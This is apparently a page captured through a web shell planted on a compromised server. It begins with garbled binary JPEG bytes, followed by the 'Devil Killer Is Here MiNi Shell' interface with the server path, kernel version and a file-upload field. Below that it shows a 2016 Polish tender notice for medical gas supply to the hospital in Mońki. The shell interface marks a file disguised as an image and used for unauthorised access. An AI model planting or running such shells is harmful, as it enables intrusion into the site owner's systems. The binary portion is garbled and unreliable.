JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160112/3259-N-2016.html

<p class="kh_header"><b>Mońki: 1.	Przedmiotem zamówienia jest sukcesywna dostawa  gazów medycznych wraz z dzierżawą zbiornika i butli ujętych  w pakietach I-III dla potrzeb Samodzielnego Publicznego  Zakładu Opieki Zdrowotnej  w Mońkach</b><br>
<b>Numer ogłoszenia: 3259 - 2016; data zamieszczenia: 12.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Mońkach , al. Niepodległości 9, 19-100 Mońki, woj. podlaskie, tel. 85 727 81 30, 668 877 590, faks 85 727 81 35, 727 81 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.monki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.	Przedmiotem zamówienia jest sukcesywna dostawa  gazów medycznych wraz z dzierżawą zbiornika i butli ujętych  w pakietach I-III dla potrzeb Samodzielnego Publicznego  Zakładu Opieki Zdrowotnej  w Mońkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa  gazów medycznych wraz z dzierżawą zbiornika i butli ujętych  w pakietach I-III dla potrzeb Samodzielnego Publicznego  Zakładu Opieki Zdrowotnej  w Mońkach.
Szczegółowy opis przedmiotu zamówienia, o asortymencie i ilościach został określony 
w formularzu  ofertowym stanowiącym załącznik nr 1 do specyfikacji istotnych warunków zamówienia, stanowiącą jego  integralną część, w tym w  szczególności obejmuje:
sukcesywną dostawę transportem specjalistycznym tlenu medycznego w stanie ciekłym oraz innych gazów medycznych  do siedziby Zamawiającego;
dzierżawę zbiornika ciekłego tlenu oraz butli 
dostawę, montaż i najem stacji zgazowania tlenu ze zbiornikiem na ciekły tlen (1szt. do części szpitala przy  Al. Niepodległości 9 , Mońki 1 szt. 
wykonanie przeglądu instalacji gazów medycznych Szpitala przy Al. Niepodległości 9 , Mońki w terminie 30 dni od daty podpisania umowy (52 punktów poboru tlenu).
Dzierżawa zbiornika ciekłego tlenu medycznego o pojemności netto zbiornika  3000 - 4000 l wraz z parownicą o wydajności od 110 do 120 m3/h obejmująca:  
3.1 Wszelkie prace konieczne do realizacji zaproponowanego rozwiązania technicznego, w szczególności: 
a) opracowanie dokumentacji technicznej związanej z dostosowaniem dotychczasowego miejsca montażu zbiornika (o ile będą wymagane);
b) wykonanie prac przygotowawczych niezbędnych do montażu i uruchomienia zbiornika oraz niezbędnych urządzeń towarzyszących. (jeżeli zajdzie taka konieczność);
c) dostawa zbiornika wraz niezbędną infrastrukturą techniczną (w szczególności: parownica, reduktory, przyłącza, ect.) konieczną do jego montażu i podłączenia do istniejącej u Zamawiającego instalacji tlenu medycznego; 
d) montaż i uruchomienie dostarczonego rozwiązania technicznego, podłączenie do istniejącej infrastruktury technicznej Zamawiającego;
e) wykonanie wszelkich niezbędnych badań i dopuszczenie do eksploatacji. 
f) zabezpieczenie terenu zbiornika przed niepowołanym dostępem (ogrodzenie zbiornika i parownika)  (jeżeli zajdzie taka konieczność);
g) odtworzenie terenu (trawnik, chodniki, droga) jeśli nastąpią uszkodzenia zwiane z dostawą i pracami przygotowawczo-montażowymi;
h) demontaż przedmiotu niniejszego zamówienia w zakresie w/w zbiorników i parownicy, po zakończeniu trwania umowy, o ile kolejne postępowanie wyłoni innego Wykonawcę; 
i) zapewnienie ciągłości pracy szpitala poprzez ciągłość dostaw w czasie napraw, przełączeń, przeglądów i innych operacji wymagających wyłączenia zbiornika lub parownic: na czas wynikający z niemożliwości korzystania ze zbiornika lub parownic montaż/demontaż przegląd, awaria itp., Wykonawca zapewni na własny koszt butle z tlenem do rezerwowego źródła tlenu  wyposażone w dwie baterie butlowe 6 x 40 l.
3.2.  Zbiornik  musi być dostosowany parametrami technicznymi (ciężar, wymiar itd.) do istniejących  fundamentów i ogrodzenia. Projekty fundamentów zostały zawarte w  Załączniku
nr 8 do siwz. 
Lokalizacja Mońki, Al. Niepodległości 9, gm. Mońki.
W zakresie lokalizacji przy Al. Niepodległości 9, gm. Mońki, w przypadku nie spełnienia przez oferowany przez Wykonawcę zbiornik wymogów określonych w  pkt 3.2. , Wykonawca będzie zobowiązany do dostosowania na swój koszt fundamentów pod posadowienie oferowanego zbiornika zgodnie z obowiązującymi przepisami prawa budowlanego.
Zbiornik powinien  posiadać odpowiednią dokumentację techniczną oraz powinny być zarejestrowany w lokalnym Urzędzie Dozoru Technicznego (pełny dozór urządzeń ciśnieniowych).
 Zbiornik musi posiadać odpowiednią dokumentację techniczną, świadectwa prób, certyfikaty oraz po posadowieniu i podłączeniu zostać zgłoszony i odebrany przez Urząd Dozoru Technicznego. Zgłoszenie i koszty związane z pierwszym odbiorem są po stronie Wykonawcy. 
Wykonawca zapewni stały nadzór Urzędu Dozoru Technicznego, przy współudziale Zamawiającego.
W trakcie okresu najmu Wykonawca gwarantuje całodobowy serwis techniczny oraz konieczne przeglądy okresowe oraz naprawy serwisowe na własny koszt , a w przypadku awarii Wykonawca zapewni inne urządzenia do przechowywania tlenu na czas naprawy zbiornika.
 Zamawiający umożliwi wizję lokalną pomieszczeń przeznaczonych do instalacji zbiornika - na wniosek wykonawcy, w tym zakresie należy przesłać wniosek o umożliwienie wizji lokalnej na numer faksu lub e-maila podany w siwz.
  wykonanie przeglądu instalacji gazów medycznych Szpitala przy Al. Niepodległości 9 w terminie 30 dni od daty podpisania umowy (52  punktów poboru tlenu).
   Opis przedmiotu zamówienia w części dotyczącej ww pkt: 
Wykonanie przeglądu instalacji wewnętrznej gazów medycznych:
Zakres czynności obejmuje w szczególności:
Inwentaryzacja elementów instalacji
Kontrola mechanicznego działania punktów poboru
Sprawdzenie szczelności punktów poboru do gazów medycznych
Badanie rurociągów gazów sprężonych na obecność zanieczyszczeń stałych
Kontrola systemów alarmowych w zakresie ich funkcjonalności
Kontrolę szczelności zaworów odcinających
Sprawdzenie nastawy zaworów nadmiarowych
Sporządzenie protokołu zawierającego szczegółowy spis wszystkich punktów poboru z podziałem na poszczególne pomieszczenia i opis wyników badań uzyskanych w zakresie wykonanych czynności kontrolnych
Przegląd źródeł zasilania instalacji gazów medycznych - stacje redukcyjne do gazów  Sprężonych, rezerwowe źródło tlenu.
3.10.2.   Zakres czynności obejmuje w szczególności:
szczelności połączeń gwintowanych
sprawności sygnalizacji alarmowej tablicy redukcyjnej
nastawy reduktorów ciśnienia
nastawy zaworów nadmiarowych
sprawności manometrów kontrolnych
prawidłowości działania zaworów zwrotnych ramp butlowych

Wnioski pokontrolne winny zawierać odniesienie do spełnienia obowiązujących wymagań zawartych w: - PN-EN ISO 7396-1 Systemy rurociągowe do sprężonych gazów medycznych - Część 1: Systemy rurociągowe do sprężonych gazów medycznych i próżni
Odbiór  zbiornika nastąpi w ciągi 3 dni roboczych po dokonaniu zgłoszeniu gotowości do odbioru i potwierdzony zostanie pisemnym protokołem odbioru ilościowego i jakościowego, podpisanym przez przedstawicieli Stron. 
Czas reakcji na zgłoszenie usterki, dotyczącej wydzierżawianych zbiorników wyniesie max. 24 godziny. 
Wykonawca musi  zdemontować i usunąć po zakończeniu trwania umowy (jeżeli zajdzie taka konieczność) w ciągu 14  dni roboczych zbiornik z terenu Zamawiającego. 

4. W związku z dostawą ciekłego tlenu medycznego, transportem specjalistycznym: 
Wykonawca zobowiązuje się: 
a) dostarczać ciekły tlen medyczny do siedziby Zamawiającego do siedziby Zamawiającego według bieżących potrzeb Zamawiającego - najpóźniej w ciągu 3-ch dni roboczych od zgłoszenia zapotrzebowania (faksem lub telefonicznie) przez Zamawiającego, 
b) napełnić, zbiornik ciekłego tlenu do stanu przewidzianego w dokumentacji technicznej. 
c) zapewnić zgodność i jakość dostarczanego ciekłego tlenu medycznego z normami PN-C- 84911:1997 i F.P.IV.  oraz dołączać do każdej dostawy, wyniki badań czystości gazu - świadectwa kontroli jakości. 
d) Ilość zatankowanej do zbiornika cieczy (ciekły tlen medyczny) określona będzie na podstawie pomiaru za pomocą przepływomierza umieszczonego przy cysternie. Przepływomierze przy cysternach muszą posiadać pozwolenie Głównego Prezesa Urzędu Miar w Warszawie -na tankowanie zbiorników. 
e) Wykonawca zobowiązany jest do uwzględnienia reklamacji ilościowych dotyczących dostaw ciekłego tlenu medycznego w ciągu max. 7 dni od ich zgłoszenia. 
f) Zamawiana ilość podana jest w załączniku nr 1 do specyfikacji istotnych warunków zamówienia 


5. WYMAGANIA OGÓLNE, WYMOGI TECHNICZNE BUTLI, GAZÓW W BUTLACH I PRZEBIEGU TRANSAKCJI 
Butle winny być trwale oznakowane w sposób jednoznacznie identyfikujący: 
Właściciela, który odpowiada za jej stan techniczny, bezpieczeństwo i dostosowanie do norm Unii Europejskiej zgodnie z odpowiednimi przepisami. Każda czasza butli winna być odpowiednio oznakowana kodem barwnym, zgodnie z obowiązującymi normami europejskimi. 
Butle powinny być napełnione zgodnie z wymaganiami technicznymi dystrybucji poszczególnych gazów (cieczy), powinny być zabezpieczone plombami jednostki odpowiedzialnej za zawartość (napełniającej) w sposób uniemożliwiający jej zmianę lub użycie butli bez naruszenia plomby. 
Butle z gazami medycznymi powinny być posiadać jednoznaczną identyfikację zawartość - seria napełnionej zawartości i data przydatności do używania. 
Konserwacja, naprawy i legalizacja butli należy do Wykonawcy. 
Oferowany przedmiot zamówienia powinien spełniać odpowiednie warunki wprowadzenia go do obrotu medycznego i używania, co należy odpowiednio udokumentować. 

Odpowiednie dokumenty (świadectwa, certyfikaty, itp.) dopuszczające oferowane gazy medyczne do obrotu i stosowania medycznego wydane zgodnie z obowiązującymi przepisami. Przed wprowadzeniem pierwszej dostawy należy przedstawić Zamawiającemu dokumenty upoważniające do wprowadzenia do obrotu poszczególnych gazów (w przypadku zmiany ich treści, utraty ważności lub jej przedłużenia należy każdorazowo zaktualizować przedstawioną dokumentację) 
Do każdej dostawy należy załączyć dokumenty potwierdzające badanie jakości dotyczące dostarczonej dostawy (serii) gazów. 
Odpowiednie karty charakterystyki substancji szkodliwych. 
Do każdej dostawy powinna być dołączona i potwierdzona przez strony Wykonawcy  i Zamawiającego szczegółowa specyfikacja dostarczonych do Zamawiającego i przekazanych do Wykonawcy. 
Dwutlenek węgla ciekły medyczny będzie miał bezpośredni kontakt z pacjentem i będzie stosowany w zabiegach rehabilitacyjnych (krioterapii).
Oferowany przedmiot zamówienia musi być dopuszczony do obrotu i używania w Polsce zgodnie z Ustawą Prawo Farmaceutyczne (Dz. U. Nr 126, poz., 1381 z 6 września 2001 r. ze zmianami).
Oferowany przedmiot zamówienia musi być dopuszczony do obrotu i używania w Polsce zgodnie z Ustawą o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U z 2010 r. Nr 107, poz. 679)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 24.11.15.00-5, 24.11.15.00-0, 24.11.19.00-4, 24.11.21.00-3, 24.11.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę aktualnego zezwolenia Głównego Inspektora Farmaceutycznego na wytwarzanie produktu leczniczego (w przypadku producenta) lub prowadzenie hurtowni farmaceutycznej (w przypadku dystrybutora) lub oświadczy, iż w zakresie oferowanego przedmiotu zamówienia zezwolenie takie nie jest wymagane,

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale  XIV pkt. 1  niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Zamawiający uzna ten warunek za spełniony  poprzez złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu,  z wykorzystaniem formularza stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia,

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale  XIV pkt. 1  niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Zamawiający uzna ten warunek za spełniony  poprzez złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu, z wykorzystaniem formularza stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia,

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale  XIV pkt. 1  niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)	Zamawiający uzna ten warunek za spełniony  poprzez złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu,  z wykorzystaniem formularza stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia,

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale  XIV pkt. 1  niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>e)	Zamawiający uzna ten warunek za spełniony  poprzez złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu,  z wykorzystaniem formularza stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia.

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale  XIV pkt. 1  niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) w przypadku zaoferowania przez Wykonawców wyrobu medycznego:
- oświadczenie o posiadaniu dokumentów dopuszczających oferowany przedmiot zamówienia do obrotu i używania - zgodnie z ustawą z dnia 20 maja 2010 r. (Dz. U. z 2010 r., Nr 107, poz. 679)  o wyrobach  medycznych. Na każde żądanie Zamawiającego, na każdym etapie postępowania i w trakcie trwania umowy w sprawie zamówienia publicznego przedłożę/my wymagane dokumenty, złożone z wykorzystaniem formularza stanowiącego załącznik nr 5 do specyfikacji istotnych warunków zamówienia; 
b)  w przypadku zaoferowania przez Wykonawców produktu leczniczego:
- oświadczenie o posiadaniu dokumentów dopuszczających zaoferowane przez wykonawcę  produkty lecznicze do obrotu na terytorium RP - zgodnie z przepisami ustawy z dnia 06.09.2001r. - Prawo  
Farmaceutyczne (Dz. U.  2008 nr 53 poz. 533 z późn.zm.). Na każde żądanie Zamawiającego, na każdym etapie postępowania i w trakcie trwania umowy w sprawie zamówienia publicznego przedłożę/my wymagane dokumenty, złożone z wykorzystaniem formularza stanowiącego załącznik nr 6 do specyfikacji istotnych warunków zamówienia; 
c)  karty charakterystyki dla zaoferowanego przez Wykonawcę przedmiotu zamówienia wydanym przez producenta zaoferowanego przedmiotu zamówienia, dla każdego pakietu i pozycji, z zaznaczeniem pakietu i pozycji, których dotyczą. W przypadku aktualizacji kart charakterystyki w okresie prowadzonego postępowania o udzielenie zamówienia oraz obowiązywania umowy,
 tj. pojawienia się jakichkolwiek zmian wprowadzonych przez producenta, Wykonawca w terminie 7 dni od wprowadzenia tych zmian przekaże Zamawiającemu uaktualnioną kartę charakterystyki produktu.

W przypadku wątpliwości  Zamawiający zastrzega sobie prawo, do zażądania dokumentów potwierdzających spełnianie warunków/parametrów granicznych określonych przez Zamawiającego  w formularzu ofertowym stanowiącym załącznik nr 1 do specyfikacji istotnych warunków zamówienia 
( np. opisy techniczne, katalogi, instrukcje użytkowania, itp. oferowanego przez Wykonawcę przedmiotu zamówienia).
Dokumenty te zostaną udostępnione przez Wykonawców, na każde żądanie Zamawiającego na każdym etapie postępowania oraz obowiązywania umowy. Oświadczenia lub dokumenty  będą  dla Zamawiającego źródłem  wiedzy o zgodności oferty  Wykonawcy z  wymaganiami  zawartymi w specyfikacji istotnych warunków zamówienia.

2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia kopi dokumentów dotyczących odpowiednio wykonawcy są poświadczane za zgodność z oryginałem przez Wykonawcę.
3. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust.1 ustawy Prawo zamówień publicznych zawierające błędy do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.
 	Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez oferowane dostawy wymagań określonym przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
4. Zamawiający, wezwie w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
